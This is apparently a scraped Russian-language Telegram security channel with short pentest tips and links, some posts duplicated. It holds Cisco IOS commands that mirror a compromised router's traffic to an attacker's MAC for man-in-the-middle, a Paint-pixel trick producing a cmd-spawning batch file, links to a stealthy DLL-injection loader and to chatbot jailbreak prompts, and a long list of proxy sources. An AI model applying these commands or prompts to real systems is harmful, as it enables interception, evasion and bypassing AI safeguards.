🔥Traffic mirroring
///Идея///
Если при пентесте сети есть скомпрометированный маршрутизатор Cisco, то можно попробовать сделать зеркалирование траффика
///Реализация///
Создаем профиль ToAttacker для экспорта трафика:
По итогу реализации, маршрутизатор будет слать весь траффик на подконтрольное устройство, что дает нам полноценный MITM.
Недостатком данного способа является то, что подконтрольное устройство должно находиться в одной сети с маршрутизатором.
#cisco #mitm
///Идея///
Если при пентесте сети есть скомпрометированный маршрутизатор Cisco, то можно попробовать сделать зеркалирование траффика
///Реализация///
Создаем профиль ToAttacker для экспорта трафика:
router(config)#ip traffic-export profile ToAttacker mode exportУказываем экспорт всего траффика:
router(conf-rite)#bidirectionalНа какой интерфейс экспортируем:
router(conf-rite)#interface FastEthernet0/1Какому mac адресу произвести передачу траффика, указываем наш MAC:
router(conf-rite)#mac-address 72db.9842.4f97На каком интерфейсе будем слушать траффик:
router(conf-rite)#exit
router(config)#interface FastEthernet0/0///Заключение///
router(config-if)#ip traffic-export apply ToAttacker
По итогу реализации, маршрутизатор будет слать весь траффик на подконтрольное устройство, что дает нам полноценный MITM.
Недостатком данного способа является то, что подконтрольное устройство должно находиться в одной сети с маршрутизатором.
#cisco #mitm
👍3
Forwarded from Lazarus
Главная задача «Окулус» – это выявление нарушений российского законодательства в изображениях и видеороликах. Система способна автоматически искать и распознавать нарушения закона в сети интернет.
«Система распознает изображения и символы, противоправные сцены и действия, анализирует текст в фото- и видеоматериалах. «Окулус» автоматически обнаруживает такие правонарушения, как экстремистская тематика, призывы к массовым незаконным мероприятиям, суициду, пронаркотический контент, пропаганда ЛГБТ и другие запрещённые действия», – пояснил СМИ представитель ГРЧЦ.
@Lazarus_link
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🔥Prompt injection
Промпты, которые позволяют обойти цензуру ботов.
https://github.com/Cranot/chatbot-injections-exploits
#chatbot #chatgpt #bypass
Промпты, которые позволяют обойти цензуру ботов.
https://github.com/Cranot/chatbot-injections-exploits
#chatbot #chatgpt #bypass
🔥Proxy collection
Мой список ресурсов, где можно взять прокси
https://github.com/fate0/proxylist
https://github.com/ShiftyTR/Proxy-List
https://github.com/rdavydov/proxy-list
https://github.com/mmpx12/proxy-list
https://github.com/IshanSingla/proxy-list
https://github.com/monosans/proxy-list
https://github.com/S767/proxycheck
https://github.com/UptimerBot/proxy-list
https://github.com/TheSpeedX/PROXY-List
https://github.com/aswin-m-p/proxy-list
https://github.com/reny311/proxy
https://github.com/Volodichev/proxy-list
https://github.com/RX4096/proxy-list
https://github.com/manuGMG/proxy-365
https://github.com/HyperBeats/proxy-list
https://github.com/Koshsky/proxy-getter
https://github.com/mertguvencli/http-proxy-list
https://github.com/roosterkid/openproxylist
https://github.com/hookzof/socks5_list
https://github.com/ObcbO/getproxy
https://github.com/jetkai/proxy-list
https://github.com/yuewei5215/Proxies-1
https://github.com/clarketm/proxy-list
https://github.com/sunny9577/proxy-scraper
https://github.com/stamparm/fetch-some-proxies
https://github.com/almroot/proxylist
https://github.com/takelley1/proxy-servers
https://github.com/ph4ntonn/Stowaway
https://github.com/proxyips/proxylist
https://github.com/vaitan/proxy-list
https://github.com/h4mid007/free-proxy-list
https://github.com/danieldanielecki/IT-ARMY-of-Ukraine-Resources-in-English/tree/main/proxies
https://github.com/PXEiYyMH8F/ProxyBroker
https://docs.google.com/spreadsheets/d/1k0gAbcnTSxKBAy7bxXhrLciHbby5dM0dhZheaJ4CzFs/edit#gid=640455393
http://api.rawhub.net/free/alive.txt
https://raw.githubusercontent.com/Snizi/Curious-Cat-Nuker/master/proxies.txt
http://bayanbox.ir/view/8640940569635885502/proxy-list-28000.txt
https://www.instabypass.com/proxy/proxy/proxy584261.txt
https://www.paighambot.com/wp-content/uploads/Proxies.txt
https://onehack.us/uploads/short-url/AoUbDD7zKtsHdrqph3KoZDud46d.txt
https://ab57.ru/downloads/proxylist.txt
https://webanetlabs.net/freeproxyweb/proxylist_at_15.11.2020.txt
http://flss.ru/inc/proxy/logs/good/good_2022-01-23_11-38-31_61ed1407cdc6b.txt
https://raw.githubusercontent.com/inplex-sys/hq-proxy-list/main/https.txt
https://82.146.63.185/proxy_data.txt
https://raw.githubusercontent.com/Volodichev/proxy-list/main/http.txt
https://frederik.tv/download/file/6k-Proxy.txt?i=1
http://206.189.158.112/checked.06:49:54-2022:01:21/https.txt
https://raw.githubusercontent.com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt
https://raw.githubusercontent.com/human1ty/proxy/main/http.txt
#proxy
Мой список ресурсов, где можно взять прокси
https://github.com/fate0/proxylist
https://github.com/ShiftyTR/Proxy-List
https://github.com/rdavydov/proxy-list
https://github.com/mmpx12/proxy-list
https://github.com/IshanSingla/proxy-list
https://github.com/monosans/proxy-list
https://github.com/S767/proxycheck
https://github.com/UptimerBot/proxy-list
https://github.com/TheSpeedX/PROXY-List
https://github.com/aswin-m-p/proxy-list
https://github.com/reny311/proxy
https://github.com/Volodichev/proxy-list
https://github.com/RX4096/proxy-list
https://github.com/manuGMG/proxy-365
https://github.com/HyperBeats/proxy-list
https://github.com/Koshsky/proxy-getter
https://github.com/mertguvencli/http-proxy-list
https://github.com/roosterkid/openproxylist
https://github.com/hookzof/socks5_list
https://github.com/ObcbO/getproxy
https://github.com/jetkai/proxy-list
https://github.com/yuewei5215/Proxies-1
https://github.com/clarketm/proxy-list
https://github.com/sunny9577/proxy-scraper
https://github.com/stamparm/fetch-some-proxies
https://github.com/almroot/proxylist
https://github.com/takelley1/proxy-servers
https://github.com/ph4ntonn/Stowaway
https://github.com/proxyips/proxylist
https://github.com/vaitan/proxy-list
https://github.com/h4mid007/free-proxy-list
https://github.com/danieldanielecki/IT-ARMY-of-Ukraine-Resources-in-English/tree/main/proxies
https://github.com/PXEiYyMH8F/ProxyBroker
https://docs.google.com/spreadsheets/d/1k0gAbcnTSxKBAy7bxXhrLciHbby5dM0dhZheaJ4CzFs/edit#gid=640455393
http://api.rawhub.net/free/alive.txt
https://raw.githubusercontent.com/Snizi/Curious-Cat-Nuker/master/proxies.txt
http://bayanbox.ir/view/8640940569635885502/proxy-list-28000.txt
https://www.instabypass.com/proxy/proxy/proxy584261.txt
https://www.paighambot.com/wp-content/uploads/Proxies.txt
https://onehack.us/uploads/short-url/AoUbDD7zKtsHdrqph3KoZDud46d.txt
https://ab57.ru/downloads/proxylist.txt
https://webanetlabs.net/freeproxyweb/proxylist_at_15.11.2020.txt
http://flss.ru/inc/proxy/logs/good/good_2022-01-23_11-38-31_61ed1407cdc6b.txt
https://raw.githubusercontent.com/inplex-sys/hq-proxy-list/main/https.txt
https://82.146.63.185/proxy_data.txt
https://raw.githubusercontent.com/Volodichev/proxy-list/main/http.txt
https://frederik.tv/download/file/6k-Proxy.txt?i=1
http://206.189.158.112/checked.06:49:54-2022:01:21/https.txt
https://raw.githubusercontent.com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt
https://raw.githubusercontent.com/human1ty/proxy/main/http.txt
#proxy
GitHub
GitHub - fate0/proxylist: proxylist, generate by fate0/getproxy project in every 15 minute
proxylist, generate by fate0/getproxy project in every 15 minute - fate0/proxylist
👍1
🔥Spawn cmd via Paint
Для того, чтобы сгенерировать пейлоад с запуском CMD в paint:
- Создаем изображение 6x1 в пикселях.
- Далее устанавливаем последовательно цвета для каждого из 6 пикселей соответствуя таблице.
#cmd #execution #fun
Для того, чтобы сгенерировать пейлоад с запуском CMD в paint:
- Создаем изображение 6x1 в пикселях.
- Далее устанавливаем последовательно цвета для каждого из 6 пикселей соответствуя таблице.
| R | G | B |- Далее просто переименовываем файл в .bat и запускаем
| --- | --- | --- |
| 10 | 0 | 0 |
| 13 | 10 | 13 |
| 100 | 109 | 99 |
| 120 | 101 | 46 |
| 0 | 0 | 101 |
| 0 | 0 | 0 |
#cmd #execution #fun
#tools #bugbounty #pentest
⚙️ Firefly — свежий инструмент для фаззинга методом черного ящика. Инструмент предоставляет большого количество встроенных проверок для обнаружения поведения вашей цели.
https://github.com/Brum3ns/firefly
https://github.com/Brum3ns/firefly
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Brum3ns/firefly: Black box fuzzer for web applications
Black box fuzzer for web applications. Contribute to Brum3ns/firefly development by creating an account on GitHub.
🔥DLL loader
Выполняет скрытую инъекцию библиотеки
https://github.com/NUL0x4C/AtomLdr
#evasion #DLL #redteam
Выполняет скрытую инъекцию библиотеки
https://github.com/NUL0x4C/AtomLdr
#evasion #DLL #redteam
Forwarded from Курсы хуюрсы
Forwarded from ProgramsHub
Project Based Learning
A list of #programming #tutorials in which aspiring software developers learn how to build an application from scratch. These tutorials are divided into different primary programming languages. Tutorials may involve multiple technologies and languages.
https://github.com/practical-tutorials/project-based-learning
A list of #programming #tutorials in which aspiring software developers learn how to build an application from scratch. These tutorials are divided into different primary programming languages. Tutorials may involve multiple technologies and languages.
https://github.com/practical-tutorials/project-based-learning
🔥VPN detect
Хорошее чтиво, для изучения того, как провайдеры распознают и блокируют VPN
https://habr.com/ru/post/710980/
#vpn
Хорошее чтиво, для изучения того, как провайдеры распознают и блокируют VPN
https://habr.com/ru/post/710980/
#vpn
Хабр
Интернет-цензура и обход блокировок: не время расслабляться
Статья опубликована под лицензией Creative Commons BY-NC-SA . Disclaimer: практически всё, описанное в статье, не является чем-то принципиально новым или инновационным - оно давно известно и...
🔥Decider
A web application that assists network defenders, analysts, and researcher in the process of mapping adversary behaviors to the MITRE ATT&CK® framework.
https://github.com/cisagov/decoder
#mitre
A web application that assists network defenders, analysts, and researcher in the process of mapping adversary behaviors to the MITRE ATT&CK® framework.
https://github.com/cisagov/decoder
#mitre
🔥Freegpt
Кто еще не успел потыкать ChatGPT и не хочет париться с регистрацией аккаунта, может затестить бесплатную версию от иранских коллег с отсутствием регистрации.
https://freegpt.one/
#chatgpt
Кто еще не успел потыкать ChatGPT и не хочет париться с регистрацией аккаунта, может затестить бесплатную версию от иранских коллег с отсутствием регистрации.
https://freegpt.one/
#chatgpt
👍1
🔥Get screenshot from memory dump
Предположим, что требуется вытащить скрин с виртуалки, в то время, когда происходило снятие дампа памяти.
Так вот, если на руках есть дамп памяти виртуалки, то вытащить скрин не получится, потому что его части будут раскиданы по разным уголкам дампа. Но вот если мы возьмем виртуальную память процесса с gui, например explorer.exe, то там уже байты скрина окружения будут идти последовательно.
Дампим explorer и скармливаем его утилите binocle, которая позволяет визуализировать данные.
https://github.com/sharkdp/binocle
Из важных моментов:
- stride должен быть кратен 4
- width должен равняться размеру ширины рабочего стола
- отрисовка байтов должна идти в обратном порядке, то есть BGR
Также можно попытаться вытащить элементы окон, которые находятся за главным окном, если сделать дамп соответствующего процесса.
#forensic #volatility
Предположим, что требуется вытащить скрин с виртуалки, в то время, когда происходило снятие дампа памяти.
Так вот, если на руках есть дамп памяти виртуалки, то вытащить скрин не получится, потому что его части будут раскиданы по разным уголкам дампа. Но вот если мы возьмем виртуальную память процесса с gui, например explorer.exe, то там уже байты скрина окружения будут идти последовательно.
Дампим explorer и скармливаем его утилите binocle, которая позволяет визуализировать данные.
https://github.com/sharkdp/binocle
Из важных моментов:
- stride должен быть кратен 4
- width должен равняться размеру ширины рабочего стола
- отрисовка байтов должна идти в обратном порядке, то есть BGR
Также можно попытаться вытащить элементы окон, которые находятся за главным окном, если сделать дамп соответствующего процесса.
#forensic #volatility
👍2